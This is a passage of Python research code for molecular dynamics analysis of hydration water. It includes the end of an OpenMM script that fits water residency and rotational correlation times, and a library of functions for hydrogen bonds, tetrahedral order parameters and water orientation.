opt2, pcov2 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,1]/numShellWaters[0,1])
decayTime2 = opt2[1]
print("\nIn the fully coupled ensemble:")
print("\tWater residency correlation time for 1st shell waters: %f"%decayTime1)
print("\tWater residency correlation time for 2nd shell waters: %f"%decayTime2)
#Finally, want to now save the dipoles over time and then also fit to stretched exponential
np.savetxt("rotational_timeCorr_coupled.txt", np.hstack((np.array([timePoints]).T, dipoleCosAng)),
header="Time (ps) Cos(angle) between starting dipole and dipole for 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,1])
decayTime2 = opt2[1]
print("\tRotational correlation time for 1st shell waters: %f"%decayTime1)
print("\tRotational correlation time for 2nd shell waters: %f"%decayTime2)
os.chdir('../')
#Next simulate with decoupled state, but do same analysis
#At least this way the volumes considered will be similar
SoftCoreForce.setGlobalParameterDefaultValue(0, 0.0)
SoluteCoulForce.setGlobalParameterDefaultValue(0, 0.0)
for k, ind in enumerate(soluteIndices):
[charge, sig, eps] = NBForce.getParticleParameters(ind)
NBForce.setParticleParameters(ind, alchemicalCharges[k]*0.0, sig, eps)
forceLabelsRef = getForceLabels(systemRef)
decompEnergy(systemRef, struc.positions, labels=forceLabelsRef)
os.mkdir('decoupled')
os.chdir('decoupled')
#Do NVT simulation
stateFileNVT, stateNVT = doSimNVT(top, systemRef, integratorRef, platform, prop, temperature, pos=struc.positions)
#And do NPT simulation using state information from NVT
stateFileNPT, stateNPT = doSimNPT(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNVT)
#Now perform dynamics simulation to get dynamics - this is defined here, NOT in openmm_surface_affinities_lib.py
numShellWaters, dipoleCosAng, timePoints = doSimDynamics(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNPT)
#Finally, want to now save the water residency over time and then also fit to exponential decay
np.savetxt("shell_watCounts_decoupled.txt", np.hstack((np.array([timePoints]).T, numShellWaters)),
header="Time (ps) Number waters in the 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,0]/numShellWaters[0,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,1]/numShellWaters[0,1])
decayTime2 = opt2[1]
print("\nIn the perfectly decoupled ensemble:")
print("\tWater residency correlation time for 1st shell waters: %f"%decayTime1)
print("\tWater residency correlation time for 2nd shell waters: %f"%decayTime2)
#Finally, want to now save the dipoles over time and then also fit to stretched exponential
np.savetxt("rotational_timeCorr_decoupled.txt", np.hstack((np.array([timePoints]).T, dipoleCosAng)),
header="Time (ps) Cos(angle) between starting dipole and dipole for 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,1])
decayTime2 = opt2[1]
print("\tRotational correlation time for 1st shell waters: %f"%decayTime1)
print("\tRotational correlation time for 2nd shell waters: %f"%decayTime2)
os.chdir('../')
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: Surface_Affinities_Optimization/libraries/water_properties.py
```python
import sys, os
import numpy as np
import scipy.optimize as optimize
from scipy.special import sph_harm
import waterlib as wl
#Define constants and unit conversions
#conversion for surface tension
kBJ = 1.38064852*(10**(-23))
temp = 300.0
tomJm2 = kBJ*temp*1000.0*(10**20) #converts kBT/Angstrom^2 to mJ/m^2
#Convert potential energy to kBT
kBTkcal = 0.0019858775*300.0
#Water density
watdens = 0.033456 # molecules or oxygens per Angstrom ^ 3 near 300 K
#Define library of useful functions
def SASAperAtom(pos, radii, radius=1.4, nPoints = 1000, nExpose = 10):
"""Inputs:
pos - Nx3 array of atomic positions
radii - N array of atomic radii
radius - solvent radius to "roll" over surface
nPoints - number points on each sphere
nExpose - number exposed points on atom (sphere) to be considered on surface
Outputs:
SASAper - SASA for each atom
surfAtoms - array of 1 for solvent exposed, 0 for not on surface
"""
points = wl.spherepoints(nPoints)
SASAper, surfAtoms = wl.spheresurfaceareas(pos, radii+radius, points, nExpose)
return SASAper, surfAtoms
def PepWatHBonds(allPos, pepAccInds, pepDonInds, watInds, distCut = 2.1, angCut = 30.0):
"""Currently kind of wack (does acceptor to hydrogen distance). Also, calculating
H-bonds geometrically seems less useful.
Inputs:
allPos - full position array for trajectory frame (all atoms included)
pepAccInds - global indices of peptide acceptors
pepDonInds - global indices of peptide donors
watInds - global indices of water atoms in selected hydration shell(s)
distCut(=2.1) - distance cutoff for H-bond detection
angCut(=30.0) - angle cutoff for H-bond detection
Outputs:
NBonds - number of detected H-bonds
bondsPer - number H-bonds for each water molecule with peptide
donors - indices of donors (H atoms only) as string
acceptors - indices of acceptors as string
"""
#Get H-bond info
NBonds, watAcc, watDon, pepAcc, pepDon = wl.findhbonds(
allPos[pepAccInds], allPos[pepDonInds], allPos[watInds], distCut, angCut)
#And sort nicely into just acceptors and donors
acceptorsList = []
donorsList = []
bondsWat = np.zeros(int(len(watInds)/3))
for (j, val) in enumerate(pepAcc):
acceptorsList = acceptorsList + (val*[pepAccInds[j]])
for (j, val) in enumerate(pepDon):
donorsList = donorsList + (val*[pepDonInds[j]])
for (j, val) in enumerate(watAcc):
acceptorsList = acceptorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
for (j, val) in enumerate(watDon):
donorsList = donorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
#Above uses properties of python lists to add each index the number of H-bonds it participates in
bondsPer = bondsWat
#For easy file writing, make donors and acceptors into strings of indices
#Remember that the sim package indexes at zero!
donors = ''.join(str(e)+"|" for e in donorsList)
acceptors = ''.join(str(e)+"|" for e in acceptorsList)
return NBonds, bondsPer, acceptors, donors
def BBHBonds(allPos, pepAccInds, pepDonInds, distCut = 2.1, angCut = 30.0):
"""Finds H bonds between two list of acceptors and donors. Intended for just peptide backbone.
Inputs:
allPos - full position array for trajectory frame
pepAccInds - global indics of peptide acceptors
pepDonInds - global indices of peptide doneors
distCut(=2.1) - distance cutoff for H-bond detection
angCut(=30.0) - angle cutoff for H-bond detection
Outputs:
NBonds - number of detected H-bonds
donors - indices of donors as string
acceptors - indices of acceptors as string
"""
#Get H-bonds
NBonds, pepAcc, pepDon = wl.bbhbonds(allPos[pepAccInds], allPos[pepDonInds], distCut, angCut)
#Sort nicely
acceptorsList = []
donorsList = []
for (j, val) in enumerate(pepAcc):
acceptorsList = acceptorsList + (val*[pepAccInds[j]])
for (j, val) in enumerate(pepDon):
donorsList = donorsList + (val*[pepDonInds[j]])
#set lists to strings and return
donors = ''.join(str(e)+"|" for e in donorsList)
acceptors = ''.join(str(e)+"|" for e in acceptorsList)
return NBonds, acceptors, donors
def WatHBonds(allPos, watInds, allWatInds, BoxDims, distCut = 2.1, angCut = 30.0):
"""Also kind of wack, but keeping since used in peptide-surface pulling analysis.
For a better, more general algorithm, use HBondsGeneral.
Inputs:
allPos - full position array for trajectory frame (all atoms included)
watInds - global indices of water atoms in selected hydration shell(s)
allWatInds - global indices of ALL water atoms
BoxDims - dimensions of box to account for periodic BCs (to turn off, set to zero)
distCut(=2.1) - distance cutoff for H-bond detection
angCut(=30.0) - angle cutoff for H-bond detection
Outputs:
NBonds - number of detected H-bonds
bondsPer - number of detected H-bonds for each water molecule in selection
acceptors - indices of acceptors as string
donors - indices of donors (H atoms only) as string
"""
#Get H-bond info
NBonds, watAcc, watDon = wl.wathbonds(allPos[watInds], allPos[allWatInds], BoxDims, distCut, angCut)
#And sort nicely into just acceptors and donors
#Also count number of H-bonds for each water to get estimate of average per water
acceptorsList = []
donorsList = []
bondsWat = np.zeros(int(len(watInds)/3))
for (j, val) in enumerate(watAcc):
acceptorsList = acceptorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
for (j, val) in enumerate(watDon):
donorsList = donorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
#Above uses properties of python lists to add each index the number of H-bonds it participates in
#print bondsWat
#bondsPer = np.average(bondsWat)
bondsPer = bondsWat
#For easy file writing, make donors and acceptors into strings of indices
#Remember that the sim package indexes at zero!
donors = ''.join(str(e)+"|" for e in donorsList)
acceptors = ''.join(str(e)+"|" for e in acceptorsList)
return NBonds, bondsPer, acceptors, donors
def getCosAngs(subPos, Pos, BoxDims, lowCut=0.0, highCut=3.413):
"""This is called getCosAngs, but actually just returns the angles themselves (faster to convert
from cos(theta) to theta in Fortran)
Inputs:
subPos - positions of set of atoms to measure tetrahedrality of (may be different, subset, or same as Pos)
Pos - positions of ALL atoms that can make tetrahedral configurations (needed if subPos not same as Pos)
BoxDims - current box dimensions to account for periodicity
lowCut - lower cutoff for nearest-neighbor shell (default 0.0)
highCut - higher cutoff for nearest-neighbor shell (default 3.413 - see Chaimovich, 2014, but should really
change to reflect first peak in g(r) for the chosen water model)
Outputs:
angVals - all angle values for current configuration of positions supplied
numAngs - number of angles for each central oxygen atom (i.e. number neighbors factorial)
This is useful for finding which angles belong to which central oxygens
This return value was added on 07/09/2017, so any code using this function
before then will break, unfortunately, but the fix is easy.
"""
#Set-up array to hold angle results and stack as go... list increases in size!
angVals = np.array([])
numAngs = np.zeros(len(subPos))
#Find nearest neighbors for ALL atoms in subPos
#But make sure using efficient algorithm...
#If subPos is same as Pos, use allnearneighbors instead
if np.array_equal(subPos, Pos):
nearNeighbs = wl.allnearneighbors(Pos, BoxDims, lowCut, highCut).astype(bool)
else:
nearNeighbs = wl.nearneighbors(subPos, Pos, BoxDims, lowCut, highCut).astype(bool)
#Loop over each position in subPos, finding angle made with all neighbor pairs
for (i, apos) in enumerate(subPos):
#Make sure have nearest neighbors...
if len(Pos[nearNeighbs[i]]) > 0:
#below returns symmetric, square array (zero diagonal)
tempAng = wl.tetracosang(apos, Pos[nearNeighbs[i]], BoxDims)
#Only want half of array, flattened
angVals = np.hstack((angVals, tempAng[np.triu_indices(len(tempAng),k=1)].tolist()))
numAngs[i] = tempAng.shape[0]
return angVals, numAngs
def tetrahedralMetrics(angVals, nBins=500, binRange=[0.0, 180.0]):
"""Inputs:
angVals - all angle values sampled
nBins - number histogram bins to use
binRange - histogram bin range to apply
Outputs:
angDist - distribution of angle
bins - bins used in histogramming
fracTet - fraction of distribution that is tetrahedral (integrate cosDist from -0.75 to 0.25 - see Chaimovich, 2014)
avgCos - average Cos(angle) within tetrahedral peak
stdCos - second moment of Cos(angle) within tetrahedral peak
"""
#Histogram the data - note that density set so just returns number of counts, not normalized
angDist, bins = np.histogram(angVals, bins=nBins, range=binRange, density=False)
#Take index before since want histogram bin containing this value
startTet = np.argmax(bins>np.arccos(0.25)*180.0/np.pi) - 1
endTet = np.argmax(bins>np.arccos(-0.75)*180.0/np.pi) - 1
fracTet = np.sum(angDist[startTet:endTet]) / np.sum(angDist)
#Take average and second moment within peak
avgCos = 0.0
stdCos = 0.0
angCount = 0
for ang in angVals:
if (ang >= np.arccos(0.25)*180.0/np.pi) and (ang <= np.arccos(-0.75)*180.0/np.pi):
avgCos = avgCos + np.cos(ang*np.pi/180.0)
stdCos = stdCos + np.cos(ang*np.pi/180.0)**2
angCount += 1
avgCos = avgCos / angCount
stdCos = stdCos / angCount
return angDist, bins, fracTet, avgCos, stdCos
def getOrderParamq(subPos, Pos, BoxDims, lowCut=0.0, highCut=8.0):
"""Finds angles for 4 nearest neighbors of each water and returns for all waters the
tetrahedral order parameter, q, used by Errington and Debenedetti (2001).
Inputs:
subPos - positions of set of atoms to measure tetrahedrality of (may be different, subset, or same as Pos)
Pos - positions of ALL atoms that can make tetrahedral configurations (needed if subPos not same as Pos)
BoxDims - current box dimensions to account for periodicity
lowCut - lower cutoff for nearest-neighbor shell (default 0.0)
highCut - higher cutoff for nearest-neighbor shell used to find 4 nearest neighbors
Outputs:
qVals - returns an order parameter value for each water
distNeighbs - returns distances from central oxygen to 4 nearest neighbors
"""
#Set-up array to hold results
qVals = np.zeros(len(subPos))
distNeighbs = np.zeros((len(subPos), 4))
#Find nearest neighbors for ALL atoms in subPos
#But make sure using efficient algorithm...
#If subPos is same as Pos, use allnearneighbors instead
if np.array_equal(subPos, Pos):
nearNeighbs = wl.allnearneighbors(Pos, BoxDims, lowCut, highCut).astype(bool)
else:
nearNeighbs = wl.nearneighbors(subPos, Pos, BoxDims, lowCut, highCut).astype(bool)
#Loop over each position in subPos, finding angle made with the closest 4 neighbors, then q
for (i, apos) in enumerate(subPos):
#Make sure have nearest neighbors...
if np.sum(nearNeighbs[i]) > 0:
thisPos = wl.reimage(Pos[nearNeighbs[i]], apos, BoxDims)
thisDists = np.linalg.norm(thisPos - apos, axis=1)
sortInds = np.argsort(thisDists)
newPos = thisPos[sortInds][:4]
distNeighbs[i,:] = thisDists[sortInds][:4]
#below returns symmetric, square array (zero diagonal)
tempAng = wl.tetracosang(apos, newPos, BoxDims)
#Only want half of array, flattened
angVals = tempAng[np.triu_indices(len(tempAng),k=1)]
#Now compute q for this set of angles
qVals[i] = 1.0 - (3.0/8.0)*np.sum((np.cos(angVals*np.pi/180.0) + (1.0/3.0))**2)
#Return all of the order parameter values
return qVals, distNeighbs
def findSineCoeffs(allangs, Norder=180, doNormalize=False):
"""Given an array of angles, computes the sine coefficients to the given order.
Note that to get right coefficients, will need to divide by total number of angles.
This is not done by default, assuming that angles provided are for each frame.
Inputs:
allangs - array or list of angles
Norder - (default 180) number of terms in sine series to use (excludes k=0)
doNormalize - (default False) if true, divides by number of samples to correctly normalize
Outputs:
coeffs - Norder x 2 array; 1st column is k, second column is coefficient
Comes from fact that period is zero to Pi, so only keep sin(k*angle) in series
"""
#Check if angles in radians - if any values are greater than Pi, assume in degrees
if np.max(allangs) > np.pi:
allangs = allangs * np.pi / 180.0
coeffs = np.zeros((Norder,2))
for k in range(Norder):
coeffs[k,0] = k+1
coeffs[k,1] = np.sqrt(2.0/np.pi)*np.sum(np.sin((k+1)*allangs))
if doNormalize:
coeffs = coeffs / len(allangs)
return coeffs
def distFromCoeffs(coeffs, angvals=None, Norder=60):
"""Given an array of coefficients for a sine series, compute the distribution.
Inputs:
coeffs - coefficients for each term in a sine series
assuming that for sin(k*angle) form, this array is sorted from small to large k
angvals - (default 0.0 to 180.0 by 0.01) angle values in degrees at which distribution
should be evaluated - normalization will be done for PDF along degrees
Norder - (default 60) number of terms in the series to use (i.e. number of coeffs)
Outputs:
adist - returns a normalized distribution
"""
if angvals is None:
angvals = np.arange(0.0, 180.0, 0.01)
#Also define in radians
radvals = angvals * np.pi / 180.0
adist = np.zeros(len(angvals))
normfac = 0.0
for k in range(Norder):
adist += coeffs[k]*np.sin((k+1)*radvals)
if (k+1)%2 != 0:
normfac += coeffs[k]*2.0/(k+1)
adist = adist / (normfac*(angvals[1]-angvals[0]))
return adist
def fitDist(refDists, Dist, bruteNs=200):
"""Given a set of reference distributions, as a numpy array with each distribution as a row,
fits the current distribution using a linear combination of the reference distributions.
Inputs:
refDists - array with each reference distribution as a row
Dist - (3-body angle) distribution to fit as linear combination of references with
the fitting parameters (linear coefficients) summing to one
bruteNs - number of discrete bins to use along each parameter when searching for brute minimum
Outputs:
fitParams - fit parameters resulting from fitting
resSq - sum of squared residuals for fit
resSigned - signed residuals at each point of fit
"""
#Define tolerance
tolf = 1.0e-12
tolx = 1.0e-12
#Initialize parameters to seek for - start in 4 ways and take minimum of these
initParams = np.eye(refDists.shape[0])
initParams = np.vstack((initParams, np.ones(refDists.shape[0]) * (1.0/refDists.shape[0])))
#Define an objective function to be minimized
def funcMin(vals, *withcon):
#Give it parameter values, returns squared residuals
func = np.sum((np.dot(vals, refDists) - Dist)**2)
if withcon:
func = func + (np.sum(vals) - 1.0)**2
return func
def jacFunc(vals):
#Returns the Jacobian of the function to minimize
func = np.dot(refDists, 2.0*(np.dot(vals, refDists) - Dist))
return func
def funcSquares(vals):
#Gives vector of squared residuals to see where best/worst parts of fit are
func = (np.dot(vals, refDists) - Dist)**2
return func
#Define constraints... for now say that all parms must sum to one
cons = ({'type' : 'eq',
'fun' : lambda x: np.sum(x) - 1.0,
'jac' : lambda x: np.ones(len(x))})
#And define bounds to keep all params between 0 and 1
bnds = [(0.0,1.0)]*refDists.shape[0]
#For each set of starting conditions, do minimization, then pick global min
globMinInfo = None
#And will store squared residuals at found mins as go
#Checks if one part of curve fits better than another
resSq = np.zeros((refDists.shape[1], initParams.shape[0]))
for (i, params) in enumerate(initParams):
#If only one distribution given, don't use constraint
if refDists.shape[0] == 1:
mininfo = optimize.minimize(funcMin, params, jac=jacFunc, method='SLSQP',
bounds=bnds, options={'ftol':tolf})
else:
mininfo = optimize.minimize(funcMin, params, jac=jacFunc, method='SLSQP',
constraints=cons, bounds=bnds, options={'ftol':tolf})
#print "Minimum sum of squares: %e at values "%mininfo.fun+str(mininfo.x)
if globMinInfo != None:
if mininfo.fun < globMinInfo.fun:
globMinInfo = mininfo
else:
globMinInfo = mininfo
resSq[:,i] = funcSquares(mininfo.x)
#Compare to global min with brute force
if refDists.shape[0] == 1:
(bruteMinInfo) = optimize.brute(funcMin, tuple(bnds), Ns=bruteNs, finish=None, full_output=True, disp=False)
else:
(bruteMinInfo) = optimize.brute(funcMin, tuple(bnds), args=(1,), Ns=bruteNs, finish=None, full_output=True, disp=False)
fitParams = bruteMinInfo[0]
#print "Brute force finds minima at "+str(fitParams)
#Also compute regular residuals, not squared
resSigned = np.dot(fitParams, refDists) - Dist
#print "Best fit found at:"
#print [float(q) for q in fitParams]
#print "And with parameters summing to %f" % np.sum(fitParams)
return fitParams, resSq, resSigned
def waterOrientationBinZ(Opos, Hpos, boxDim, refVec=[0.0, 0.0, 1.0], refBins=None, angBins=None):
"""Determines the angle between a reference vector and the dipoles and plane-normal vector
of all water molecule positions provided.
Inputs:
Opos - all water oxygen positions
Hpos - all water hydrogen positions
boxDim - box dimensions for imaging
refVec - the reference vector for water orientation, default
is the z-direction [1, 0, 0]
refBins - bins along the direction of refVec that the waters
should be placed into (default is min and max along refVec)
angBins - bins for calculated angles, default 500 bins from 0 to 180
Outputs:
plane2Dhist - 2D histogram with angle bins varying over rows and
refVec bins varying over rows (for the water plane vector angles)
dip2Dhist - 2D histogram as above, but for dipole vector angles
"""
#Get positions of oxygen atoms along refVec, then create
#this array with each entry repeated
refVec = refVec / np.linalg.norm(refVec)
zOpos = np.dot(Opos, refVec)
zOposforH = np.array([[z,z] for z in zOpos]).flatten()
#Compute all of the angles with respect to the reference
#Note that the dipole vector of each water molecule will be taken as
#the sum of the OH bond vectors
angDip, angPlane = wl.watorient(Opos, Hpos, refVec, boxDim)
#Set refBins if not set
if refBins is None:
refBins = np.arange(np.min(zOpos), np.max(zOpos), 0.2)
#Same for angBins
if angBins is None:
angBins = np.arange(0.0, 180.001, 180.0/500.0)
#And do 2D histogramming
plane2Dhist, angEdges, refEdges = np.histogram2d(angPlane, zOposforH, bins=[angBins, refBins], normed=False)
dip2Dhist, angEdges, refEdges = np.histogram2d(angDip, zOpos, bins=[angBins, refBins], normed=False)
return plane2Dhist, dip2Dhist
def waterOrientation(Opos, Hpos, boxDim, refVec=[0.0, 0.0, 1.0]):
"""This is a wrapper for the waterlib function watorient.
Inputs:
Opos - all water oxygen positions
Hpos - all water hydrogen positions
boxDim - box dimensions for imaging
refVec - the reference vector for water orientation, default
is the z-direction [1, 0, 0]
Outputs:
dipAngs - all angles of dipole vectors with reference vector for all waters
planeAngs - all angles of plane-normal vector to reference vector for all waters
"""
#Call watorient to get all angles
dipAngs, planeAngs = wl.watorient(Opos, Hpos, refVec, boxDim)
return dipAngs, planeAngs
def binnedVolumePofN(Opos, volBins, numBins, binMask=None):
"""Inputs:
Opos - array of oxygen 3D coordinates
volBins - volume (x,y,z coordinate) bin edges tiling the space to place waters into
Form should be tuple of x, y, and z bin edge arrays
Bins should be uniform (makes no sense to structure analysis this way otherwise)
numBins - bin edges for histogramming number of waters in each volume of volBins
binMask - boolean array of same dimension as number of bins in x, y, z
Use to exclude some bins by changing certain coordinates to False
Outputs:
numWatHist - counts for number of waters in sub-volume of size edgeLxedgeLxedgeL
"""
#Create mask if necessary
if binMask is None:
binMask = np.ones((len(volBins[0])-1, len(volBins[1])-1, len(volBins[2])-1), dtype=bool)
else:
if binMask.shape == (len(volBins[0])-1, len(volBins[1])-1, len(volBins[2])-1):
binMask = binMask
else:
print "Dimensions of mask for spatial bins does not match dimensions of spatial bins. Quitting."
sys.exit(2)
#Want to use sphere rather than cube for statistics
#So first find which bin each oxygen belongs to, then find distance
#to center of bin and see if should exclude or not
#Written in Fortran for speed
hist = wl.binongrid(Opos, volBins[0], volBins[1], volBins[2])
#Use numpy histogramming to count how many oxygens in each cube volume (doesn't use interior spheres)
#hist, edges = np.histogramdd(Opos, bins=volBins, normed=False)
#Now histogram number of waters in each subvolume, which will be P(N)
numWatHist, watedges = np.histogram(hist[binMask].flatten(), bins=numBins, normed=False)
return numWatHist
#Should also define some function "pointsInVol" that creates binMask based on given set of points or some geometry that should not be included when finding waters (i.e. like a hard sphere or protein)
def HBondsGeneral(accPos, donPos, donHPos, boxL, accInds, donInds, donHInds, distCut=3.5, angCut=150.0):
"""Wraps generalHbonds in the waterlib library to define H-bonds, and also returns their locations.
Inputs:
accPos - 3-dimensional vectors of acceptor heavy-atom positions
donPos - 3D vectors of donor heavy-atom positions (if have multiple hydrogens, must list multiple times)
donHPos - 3D vector of donor hydrogen positions (should be same length as donPos, which may have duplicates)
accInds - indices of acceptor atoms
donInds - indices of donor heavy-atoms
donHInds - indices of donor hydrogen atoms
boxL - box dimensions
distCut - (default 3.5) heavy-atom to heavy-atom distance below which an H-bond may be defined
angCut - (default 150.0) O-H---O angle cut-off, in degrees, above which an H-bond may be defined
Outputs:
NumHB - number of hydrogen bonds for acceptor/donor set provided
HBlist - NumHB x 2 array with acceptor index in the 1st column and donor index in the 2nd
HBloc - NumHB x 3 array of h-bond locations, which is halfway between the acceptor and donor H
"""
#First get H-bond matrix and locations
HBboolMat = wl.generalhbonds(accPos, donPos, donHPos, boxL, distCut, angCut)
HBboolMat = np.array(HBboolMat, dtype=bool)
#Now parse through matrix, counting H-bonds and creating list of index pairs
NumHB = np.sum(HBboolMat)
HBlist = (-1)*np.ones((NumHB, 2))
HBloc = np.zeros((NumHB, 3))
HBlistCount = 0
for i, abool in enumerate(HBboolMat):
theseDonors = donInds[abool]
if len(theseDonors) > 0:
theseDonHPos = donHPos[abool]
#Image donor H location around acceptor
theseDonHPos = wl.reimage(theseDonHPos, accPos[i], boxL)
for j, aDon in enumerate(theseDonors):
HBlist[HBlistCount,:] = [accInds[i], aDon]
HBloc[HBlistCount] = 0.5*(theseDonHPos[j] + accPos[i])
HBlistCount += 1
return NumHB, HBlist, HBloc
def computeSphericalFourierCoeffs(subPos, Pos, BoxDims, lowCut=0.0, highCut=3.413, minDegree=0, maxDegree=12):
"""Computes the vectors of Fourier coefficients for each degree of a spherical harmonic expansion
as described by Keys, Iacovella, and Glotzer, 2011. subPos is treated as the central atoms,
while Pos should include the atoms that may potentially be neighbors.
Inputs:
subPos - positions of atoms to treat as the central atoms
Pos - positions of all other atoms, which will be considered for neighbor-searching; can be same as subPos
BoxDims - box dimensions so that minimum images may be used
lowCut - (default 0.0) the lower cutoff for the radial shell
highCut - (default 3.413) the upper cutoff for the radial shell
minDegree - (default 0) the minimum spherical harmonic degree (l)
maxDegree - (default 12) the maximum spherical harmonic degree (l)
Outputs:
coeffVecs - a len(subPos) x (1 + maxDegree - minDegree) x (2*maxDegree + 1) matrix
For each central atom in subPos, a matrix of the complex-valued vectors (as rows)
is provided. This still allows magnitudes to be easily evaluated, since real and
imaginary parts of zero will contribute nothing to the magnitude
numNeighbs - number of neighbors for each water molecule (necessary to compute global order parameters
or coefficients by multiplying by this and the dividing by the total of the waters
to "average" over)
"""
#Set up the output matrix now since know size
coeffVecs = np.zeros((len(subPos), 1+maxDegree-minDegree, 2*maxDegree+1), dtype=complex)
#And array to return number of neighbors for each water
numNeighbs = np.zeros(len(subPos), dtype='float16')
#Would be nice to combine neighbor searching with 3-body angle computation or H-bonding code
#But then harder to efficiently implement different cutoffs...
#So that might be too ambitious
#Find neighbors within cutoff for ALL atoms in subPos
#But make sure using efficient algorithm...
#If subPos is same as Pos, use allnearneighbors instead
if np.array_equal(subPos, Pos):
nearNeighbs = wl.allnearneighbors(Pos, BoxDims, lowCut, highCut).astype(bool)
else:
nearNeighbs = wl.nearneighbors(subPos, Pos, BoxDims, lowCut, highCut).astype(bool)
#Loop over each position in subPos and find neighbor positions in spherical coordinates
for (i, apos) in enumerate(subPos):
#Make sure have nearest neighbors...
if len(Pos[nearNeighbs[i]]) > 0:
tempPos = wl.reimage(Pos[nearNeighbs[i]], apos, BoxDims) - apos
numNeighbs[i] = len(tempPos)
#Compute radial distances... unfortunate that have to do this again, but maybe improve later
rdists = np.linalg.norm(tempPos, axis=1)
#And get polar and azimuthal angles
polarang = np.arccos(tempPos[:,2]/rdists)
azimang = np.arctan2(tempPos[:,1], tempPos[:,0]) #Using special arctan2 function to get quadrant right
#Now compute Fourier coefficient vectors (i.e. have complex-valued component of coefficient vector
#associated with each m value, where m = -l, -l+1, ... , l)
#Loop over the desired number of coefficients to compute
for l in range(minDegree, maxDegree + 1):
thisvec = np.zeros(2*l + 1, dtype=complex)
#Also note that have one vector for each neighbor, so must loop over neighbors
for j in range(len(tempPos)):
thisvec += sph_harm(np.arange(-l, l+1), l, azimang[j], polarang[j])
thisvec /= len(tempPos)
#And compute the magnitude of this vector of complex numbers
coeffVecs[i,l-minDegree,:(2*l+1)] = thisvec
return coeffVecs, numNeighbs
def get1BodyDOFs(coordO, coordH1, coordH2):
"""Given O, H, and H 3D coordinates, identifies the 6 degrees of freedom for a single water
Note that this is assuming an inhomogeneous system
Vector returned is oxygen x, y, z, followed by the spherical coordinate angles for the
dipole vector relative to the oxygen, and the angle of rotation around the dipole vector
COORDINATES SHOULD ALREADY BE IMAGED.
"""
dofVec = np.zeros(6)
dofVec[:3] = coordO[:]
rOD = 0.5*(coordH1 + coordH2) - coordO
rOD /= np.linalg.norm(rOD) #Could hard-code the rOD length for speed... maybe later
rH1H2 = coordH2 - coordH1
rH1H2 /= np.linalg.norm(rH1H2) #And could also hard-code this, too...
#rOH1 = coordH1 - coordO
#rOH1 /= np.linalg.norm(rOH1)
#rOH2 = coordH2 - coordO
#rOH2 /= np.linalg.norm(rOH2)
unitX = np.array([0.0, 0.0, 1.0]) #Arbitrarily pick x axis to define reference plane for rotation about dipole
#cross1 = np.cross(rOH1, rOH2)
#cross1 /= np.linalg.norm(cross1)
crossX = np.cross(rOD, unitX)
crossX /= np.linalg.norm(crossX)
dofVec[3] = np.arctan2(rOD[1], rOD[0]) #Making sure to use arctan2 to cover range [-pi, pi]
dofVec[4] = np.arccos(rOD[2]) #Taking last element is same as dotting with unit Z vector
dofVec[5] = np.arccos(np.dot(rH1H2, crossX))
#dofVec[5] = np.arccos(np.dot(cross1, crossX))
return dofVec
def get2BodyDOFs(coordO1, coordH11, coordH12, coordO2, coordH21, coordH22):
"""Given 3D coordinates for all atoms in two water molecules, computes specifically 2-body degrees of freedom
Note that returns only 6 degrees of freedom, so excludes the DOFs for the first water
ONLY gives those relevant to relative distance and orientation of two waters
Order in returned vector is rO1O2, theta1, theta2, phi, chi1, chi2 (see Lazaridis and Karplus for definitions)
COORDINATES SHOULD ALREADY BE IMAGED
"""
dofVec = np.zeros(6)
rO1O2 = coordO2 - coordO1
dofVec[0] = np.linalg.norm(rO1O2)
rO1O2 /= dofVec[0]
rO2O1 = -rO1O2
rO1D1 = 0.5*(coordH11 + coordH12) - coordO1
rO1D1 /= np.linalg.norm(rO1D1) #Could hard-code to speed up... may do later
rO2D2 = 0.5*(coordH21 + coordH22) - coordO2
rO2D2 /= np.linalg.norm(rO2D2)
#Need to figure out which H is closer to other oxygen to define rH11H12 according to Lazaridis and Karplus, 1996
if np.linalg.norm(coordH11 - coordO2) <= np.linalg.norm(coordH12 - coordO2):
rH11H12 = coordH12 - coordH11
else:
rH11H12 = coordH11 - coordH12
rH11H12 /= np.linalg.norm(rH11H12) #Again, could hard code if wanted
if np.linalg.norm(coordH21 - coordO1) <= np.linalg.norm(coordH22 - coordO1):
rH21H22 = coordH22 - coordH21
else:
rH21H22 = coordH21 - coordH22
rH21H22 /= np.linalg.norm(rH21H22)
cross1 = np.cross(rO1O2, rO1D1)
cross1 /= np.linalg.norm(cross1)
cross2 = np.cross(rO2D2, rO2O1)
cross2 /= np.linalg.norm(cross2)
dofVec[1] = np.arccos(np.dot(rO1D1, rO1O2))
dofVec[2] = np.arccos(np.dot(rO2D2, rO2O1))
dofVec[3] = np.arccos(np.dot(cross1, cross2))
dofVec[4] = np.arccos(np.dot(rH11H12, cross1))
dofVec[5] = np.arccos(np.dot(rH21H22, cross2))
return dofVec
def get3BodyDOFs(coordO1, coordH11, coordH12, coordO2, coordH21, coordH22, coordO3, coordH31, coordH32):
"""Like above function, but gives 6 DOFs pertaining to just the 3-body degrees of freedom
Order in returned vector is rO1O3 (distance), theta3b (three-body angle),
omega (rotation of 3rd water around O1-O3 vector), then theta3, phi3, and chi3
(last three defined as for the second water in the 2-body DOFs, but for just the third water)
COORDINATES SHOULD ALREADY BE IMAGED
"""
dofVec = np.zeros(6)
rO1O2 = coordO2 - coordO1
rO1O2 /= np.linalg.norm(rO1O2)
rO2O1 = -rO1O2
rO1O3 = coordO3 - coordO1
